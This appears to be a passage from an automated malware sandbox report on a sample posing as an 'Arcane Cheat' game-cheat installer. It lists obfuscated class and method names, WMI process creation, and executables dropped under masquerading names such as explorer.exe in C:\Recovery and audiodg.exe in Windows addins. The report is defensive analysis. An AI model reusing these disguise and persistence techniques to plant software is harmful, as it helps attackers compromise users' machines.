            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, tHGfSGePnSN5loNOcfS.csHigh entropy of concatenated method names: '_223', 'f5hUIfVKaFVYsTeAsy5', 'bFhPmcVUGGXQ2CGts2t', 'glKNZ6Virk5k4BQc6Kq', 'hbf2eCVBhete3Ne4iiv', 'srCtQUVVErd7vrPw2gs', 'VnJf8PVcXmKgSFvweJk', 'BgpLj5VxCMpWgqSaBxR', 'lh0rbOVtHJWvAoQNNNd', 'pLZY2JVkqaKs15fuC3T'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, o4uJpAHHMVmtTsn4jR.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'YPfd24vntYVyKdCqKGR', 'cHZMQtvDMb8LNM4odaU', 'J13QUFvzCFCcolLvUON', 'eLcX3L1jwuoDOvJ4wfG', 'GhgH7P1bSwM4E3tkris', 'SFiHBl1vwelI1ZnbNTE'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, xKNkDPekrtCKJiCidfE.csHigh entropy of concatenated method names: 'Y3t3QOVBTv', 'AAY3hQglKD', 'n4trmaxUhyYEDqAJHZZ', 'oBvWX9xiHRNZTybqWHO', 'zh9vcBxT6Urf8Jwfrfy', 'NCXYluxKGcaYsovy7qK', 'Knvh0axBD2kj1VvW5ur', 'j96ENWxVTo9D4x9twQJ'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, GmsxILm2VkZtsAgbVHl.csHigh entropy of concatenated method names: 'QCq9buRbgx', 'SHD912UGQZ', 'UCB9fVMo3R', 'fXJg89qrfSYKcDJW0uF', 'yp42LAqR6rJhfnDFwuZ', 'ew0QoqqQSFTal02nXl0', 'HaOpDVqNQ1o0Pd5wOZR', 'IfNuJFqqGvEGCeO5sXn'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, OPGpF4YRttobaOjLnpx.csHigh entropy of concatenated method names: 'vmwHVWoFHM6TPj938KT', 'ktl59eoXNVJtT6KLKgm', 'kDUhy1okbYdN1P8wYsj', 'V3VyGVoyon6vSCd2BK2', 'ibuF4NbAvW', 'nPAkOXowr0eNP9t0iRc', 'cu9QBkoh415EI8anAL2', 'U8HLgJoeq0fXV2acn8y', 'E4H8EVoRbc5PdJWAMnZ', 'wMDOQioQArWK6ojif59'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, ponBPGFSjYYWTaTNaWS.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, mZddw0KAmT4LH8aKS1a.csHigh entropy of concatenated method names: 'gYVtR7xg1e', 'wT1t3IGt1U', 'qqyFMmKA4WYjA7Ay2xD', 'K6BgaGK3IrJEpYhDExF', 'NtJWdAKPLGg5sMpy4Cl', 'HI6746K73ZUrvkpgbJ1', 'ep1tegT7KY', 'lKDMFwUjF0BRtmcFmGT', 'T3x8UYUbPo24usnl6yt', 'lMhLxwKDK6R7q6sPBYQ'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, aWINOhe54FTcqUiKgOr.csHigh entropy of concatenated method names: 'ODQRhSExcJ', 'kfXRXkmatR', 'CsnRIUYHi8', 'tUxgAoVEfuWCotqRMc5', 'UM87SdV6Bg6sBC61w9V', 'nW9ZXgVLMKBF6ohthYd', 'W9V7xEVJabnkQEW3RoE', 'cwdRG7XCqP', 'P4nRmtE3Ot', 'j3ERe3pUit'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, hI5jAWmnjbvfOa9N6kn.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, QlN77246qOpP8FMnMac.csHigh entropy of concatenated method names: 'TAaOZPkj8O', 'iFIOOJJsoa', 'ATDOinXNYB', 'kCDPdQ4IBYT9kbpADQM', 'DaY2HG4PFYES6YQaKvU', 'GbXiZ640Xhcw1r8txc6', 'tPswH14mlx1Ekk7I2Hv', 'RyxZ7847Sh6cNQVf2Kf', 'PUEKOi4A8CASMDvA0HH', 'iuYHGC43EAUYe0v897U'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, SudaoE4QHy79dqhO31N.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'HDAgdXgCfOS36eWQKZ3', 'OqbEPHgWS3t1sqZ0Q7v', 'DxyG6ng9xPkRTXNfZyE', 'aYPnSQgp2RWnDSqkptQ', 'C5fvBTgfVJqkxorDytr', 'hxuriPgH9PpFcbIt1hh'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, d2NBai4MieLWa7xw9m5.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'TYePbCgPYgodH3hf0yD', 'orjYWQg7YGLcDrS7OF1', 'Pbtfj0gAxOktwNOpa2X', 'hH2Wqog3pKIiySx6Hh0', 'fCFVKMgStJKj1pAEXtP', 'imlPglgn1PbDJlMbsf9'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, lcIwC8F9WCpv3FBmSoI.csHigh entropy of concatenated method names: 'RdA4aYVVbI', 'GJ64XNCeMb', 'wTu4IPR50L', 'kTB47GklW3', 'YZV46ixQ8N', 'b5Y4lFPPv8', 'bf14KD5Wjf', 'Vge4DJcqit', 'wvV45kVl7R', 'JlB4TE7hwb'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, unZDRe42ks2m0tvvwX0.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'dUi8Z82NkikyRg4TjPp', 'XhfaAQ2q8EjbuglfQoS', 'odwxep25kXwuZke1HQt', 'svV2Bk2CuRmSSuCHKaU', 'gP3DeR2W2veKPuIw29w', 'B84GCD29FMPn6rwBrnV'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, ndyniN4VfMtAii4D02w.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'qtCP1pZuIXCgdtDFsYm', 'HMDCMxZlmnyTdUitYov', 'HAG794Z0srKoJXlLA1w', 'lTZCgaZmDBYDVFVwttD', 'piA9YRZIi1AvZS0yJID', 'qDd0UKZPgrKfg6NsIYY'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, kD6e0xFPA3o2UgPstAZ.csHigh entropy of concatenated method names: 'aj0vI5b7h1', 'jxLv7Rwssw', 'vyFv6kZB8s', 'H6Cvlyr3pC', 'VOOvKb0fBF', 'ziSbE0yDNEhOsLecqWk', 'Llbos7yzDaCFQhqU21x', 'P5yONAySeMR89yaGXUR', 'o1hdg9ynNTJel65VXWM', 'K84TUEFjGi3UbtVwbAu'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, CrlIH9a2N3DHPHhuPO0.csHigh entropy of concatenated method names: 'M22d3EFiUG', 'SoZdwvgfc5', 'MWDd8hYqPL', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'bsKdvMCmW3'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, xb42WteyXrnrraCwkE1.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'xFow8S7M3W', 'OaZPsec4TG', 'fOrwvysVwS', 'RXdPjZwhfo', 'g5T3yft5wbQASNj9Q8F', 'LR8ELUtCaLsEVDJKklg', 'SCbEWhtNZnXaEF89dpw'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, jxaQrL41pBvfTk3iEdY.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'hATghPZDZnBNZegbugR', 'Xti9RjZzsMKvE5F9Txf', 'Gfxi6C2jQeNRwr5TPo8', 'gRrKYk2bDevTl2fo5Zx', 'GIyBer2vA4NInFSIoSA', 'a0LZS6218o8XsgkIxxy'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, b1dvrGah8pK4vSdRZht.csHigh entropy of concatenated method names: 'wOLV6eC8QE', 'i1nb8cfwibtcxRLC7W3', 'IaRCn5fhvXKhPvaEyI4', 'UotjcXfaW1f1Dvi3PqT', 'JDPWgpfMVNKobDwLN1G', '_1fi', 'oh7jHopwwN', '_676', 'IG9', 'mdP'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, CKhbfiFBiMbG67oB7cq.csHigh entropy of concatenated method names: '_7zt', 'CWPnBc7KxL', 'Pp6nJAZvYN', 'MmqnykTbSJ', 'CsZno1FRyC', 'b7VncJ3iZF', 'M8XnsidnAS', 'pnni5FFxbTMmA2kjHEh', 'FlRCrmFtcKjCqUp9J4I', 'gGOovFFVgLoqlnnbBSx'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, QBjTIyF1y4jdnYQW0qM.csHigh entropy of concatenated method names: 'sFLrh12dFv', 'mMarX4xE7L', 'WlbrIlrg5d', 'R0Zr78W6O2', 'Pcer61MgWY', 'wGpJFCXiuAGy2xvoHYl', 'lax0moXKjJ4SStrYxfs', 'h3Z32xXUBkuQdfIXYJo', 'u0ya2OXB8ENXrh6Cb3L', 'TGhNvEXVV0uXG64qNcy'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, WPLdmfFfPr1ZYpLQePI.csHigh entropy of concatenated method names: 'iPJnYpljkf', 'Jjtnq19Fsc', 'Bn0ntN2GJU', 'aD8pIHFTQ3lXImJATBG', 'Mmpr9wFKJa4tgcq4q3n', 'QcRkKOFJU9BKBt8pvXb', 'aG39QGFdvCZMdAmB2iH', 'qPcrknFUBoHLyE9HSki', 'bILMTDFiDJGfTwR3h5H', 'VqswLfFBdfpSswCBnoG'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, J7WXVolgNFHWLfd4oV.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'KrI9uNvOIX65Fi7AxtZ', 'sq47Urv8p4g6C0rqZMg', 'odc1Cuv6hy5W4Z0xnJG', 'emY71RvL0gs8rNPZ6kp', 'aDbeFbvEdpvRqfxjgkO', 'EXBEsgvJ7LYCkVS7E6x'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, IPrpOg4ivGQuX1KZ1Z2.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'FaJoWsZrBS7ARdxGDYA', 'AAsGHIZNlMQVD5Vx8T4', 'ddnlQmZqkYtIBeGxnKg', 's6liWFZ580aSR7Lx3Uw', 'Q1Cq5dZCVYUjC60oqO2', 'VLgMw0ZWm7S6Ao9mhMi'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, TqIR1IaX6SfDv216AUp.csHigh entropy of concatenated method names: 'i6Tu1UL38O', 'FLyufQWIk8', 'MGpuUjypCJ', 'mhPuMIDE3G', 'd29uSAHC4b', 'oqCuHCwspP', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, X7jS2K4PlAcm9XfQG6l.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'XTLk7ogXuSOmPT1dJ7R', 'kur37rgarVt9QPc359Q', 'kgFYaqgMfNn8nMQ3C6A', 'RMXVwIgw4XeL8sZEwA2', 'triOJighi7lIxZy7rVZ', 'EcciOogessLqyVeFBy7'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, irJ7RlqH7Acvs0WRwM.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'SiYKTTt9B', 'efUlOHviYSmB2bToXfS', 'OUhGUFvBQ6y0mL1W82X', 'b85TwCvVP6ZoR39r6Ox', 'pKjwh0vc0xfyOsjE0cx', 'aWqtUdvxJIO0t3fgS2t'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, U8QthdKx7SyKMWsocs4.csHigh entropy of concatenated method names: 'V4k2ulTmA1', 'uY2MN7UmbZtfCl4xcN5', 'W5QK1RUlmNBqLesIfLa', 'S6eRgGU0VOWBTPZjKTT', 'tCKrN9UIqEafQOt0xg0', 's8RTQNUPCjppcxbcorV', 'dl82PjYpf1', 'Agv2BLOKGg', 'mrE2JyFbAE', 'FxY2yZDTpd'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, YI0q4D4mlIjFiBtYt7M.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'wFhM0yYoAxdXVDvEYhB', 'guyrHoYuVEhyYiFONkp', 'FkPXrYYlB8MT1xdlb4u', 'AUEAqwY0F68UJSAx0WR', 'Quwm0wYmBOxP8OK98bn', 'MP8viLYIXyG136F6Kpu'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, vkm65le0nr3OklfgTBH.csHigh entropy of concatenated method names: '_5u9', 'mLGPHkr9fB', 'oLXw036Vn0', 'PFiPos5P3Y', 'ghtfZTxS5NT0PkOCbIa', 'P74RB9xnLcT7wFOM3sI', 'hmoQ16xDBs5a7jYLXg0', 'Kg4HJ7xAKfuHkAnxHdw', 'oOrDaKx3uHgF1FfPc2h', 'uPvDh9xz0CoNrKFIaAp'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, Gefqe7aahIUZokdMeEe.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, SarJmF4ecfafqvWFsrF.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'lxKdiVYw3qChcfONLL0', 'YaOMLPYh4BVRdRWvx6a', 'QkPMiBYe3y2Ka0PYrgS', 'hYaolvYRwJYPA0Ddhok', 'KGl5cEYQO89cvSwGm1m', 'Hhk8WGYrb4R6jDMg8o2'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, roMYe0KBxe0WVFOZWH5.csHigh entropy of concatenated method names: 'HZWiz2s1Pf', 'zmRY0mwt3S', 'dR6YZicehL', 'w1TYO27Ado', 'CaWYirSeHX', 'z1TYYw7q5D', 'JPDYqsuIei', 'nqVYtLxwNB', 'A5hY22bY5O', 'Hu1YReSJqM'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, kW4WyY44EXMCcipRbdE.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'Wd3TgTYinyY6tL3qAdW', 'xHKfh5YBUbhVfZwutyL', 'Hw9QF8YVB7kHvWPdm0C', 'e5AnweYcCy4msaq6mOs', 'f9yp6IYxWVqm3STa6iN', 'gFWmIyYtf92DhtXUibS'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, tkBFEPFbrhKpgSJM7qo.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, zoH7lyF70Lu6988N8R7.csHigh entropy of concatenated method names: 'oswnhWJZ88', 'YCNnXnxQds', 'bInnIVJeOw', 'EwPn7cO0W2', 'kRvn63PPjj', 'y6ErbvFrKBgY0KH4SLe', 'F4RGwGFNNQ6FubucDMa', 'sAcvmIFRbro8jBaC2C8', 'wfQVHKFQ5To8jkvEcSb', 'obLtutFqPuMBDOorwtr'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, bE1htpmTHSaciN1BQo0.csHigh entropy of concatenated method names: 'VPP9EgVgMc', 'XPr9gToxk4', 'bjl9CRtOZZ', 'VXE9N6uoqa', 'w4m9kOma71', 'g1n9akTyN1', 'narTRBqlG7dq5DcCa6j', 'OVC6sgqosDcI0UGlTDP', 'JKjXyEquyJMQks1tnE1', 'XbW4Irq0I8xbFbotDDT'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, F1ZVGhet8mVhUs9nOxI.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'pf0PisF68A', '_168', 'kklQJutyg963uWs46nQ', 'FHoxmBtFp9JJFTxivUb', 'EFBG81tXVkEBESALcEt', 'E0b0hntajW6uFaUuMcj', 'cn7fg8tMHJN7ZusLoit'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, lrywdWK38UkhXCrPEOE.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'IfFqXed6EB', 'z14qIkxFdA', 'wicq7ebBYT', 'Y3Jq6FIT1c', 'yy3qlSMAj7', 'jU3U2sK2LyKciHBAlj5', 'z1sH4PK4kCv7hWMRBv7', 'xd1vhWKgmE2y6uAPAcn'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, CYMUY0KjkCkuAgTiD0K.csHigh entropy of concatenated method names: 'MqOYyNwe65', 'a4WYo4nVyT', 'OSeYcsHgO8', 'n4tYs9sKyM', 'iWYY94Fq7i', 'ddEyjJdjVOQjV4nBvmg', 'CuLPC3db4fq19r6aQfr', 'f4uieKJDyYYSk3IhQiI', 'OnGpK7JzWnvod3rj0FJ', 'sHoMF9dvhMaOOrmjrAC'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, T31VDE4xpUBw9hpGOmX.csHigh entropy of concatenated method names: 'ciAOcPbj3y', 'F3fOsbERsn', 'WcZO97qEEp', 'nS3KAi8OS0YDU6aZPIL', 'nZXf4C82Jt2jZB2NQjP', 'Srx88N84G9qubwKtZjZ', 'AubLYV88w4YGGgq67GY', 'igbObW86vkrWaUooUCZ', 'r9WPQ48LWrjpluvhwsF', 'GAA5n88EWktkTA1ah1B'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, FRfxV14r0lxFXZrXS5T.csHigh entropy of concatenated method names: 'z5COBb4Kn1', 'QVSXC18YWUwHZ0nwISZ', 'ec1BMP8gO5NEQh7SA7k', 'kDcpj48s7bxLAoctgQj', 'SWjTlm8GJRS1S5j7IHQ', 'E8Cu4n8ZQLuLbcPw8DW', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, qRquDQai83uOYBFfrPt.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'cVoL9srqV5', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, oDSKgMeFfrJ9XFXnTvW.csHigh entropy of concatenated method names: 'cCJ25ZCr2G', 'm8v2TRS1b5', 'OSY2bWfU3o', 'w7D21JLICH', 'ceG2f9pvjR', 'Lfm2UWq4yq', 'ahnShMiMQFLRDHejCJm', 'mYJM9RiX3UjorAl9FsK', 'jCL4iiiaGXbdP5sAipG', 'Fqa68Tiwx0qbN6KIbBk'

            Persistence and Installation Behavior

            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, File created: C:\Recovery\explorer.exe
            Source: unknown, Executable created and started: C:\Windows\addins\audiodg.exe
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\verify.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DQ2M9.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KH7DR.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-VNH60.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M0CO5.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-9OG1R.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-CKDJ7.tmp
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, File created: C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-B9PAS.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsdt.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe, File created: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-GMKU6.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7KMRP.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-HUQAI.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MH2RS.tmp
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, File created: C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7HO40.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6IE0O.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-4VJ8E.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dcpr.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jaas_nt.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jabswitch.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\management.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1EODK.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\fontmanager.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfr.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KP5B8.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\hprof.dll (copy)
            Source: C:\Users\user\Desktop\uChcvn3L6R.exe, File created: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\keytool.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MITQ2.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\awt.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\jawt.dll (copy)
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, File created: C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-G6G2A.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FKC0I.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\nio.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DLMB6.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\j2pkcs11.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-I5RLV.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\eula.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KL3UV.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\wsdetect.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\npjp2.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-17AF0.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\splashscreen.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\orbd.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-LUGNS.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\j2pcsc.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\instrument.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge-32.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\is-L2DJE.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-U0SIJ.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-TH2Q9.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, File created: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-5VJPG.tmp
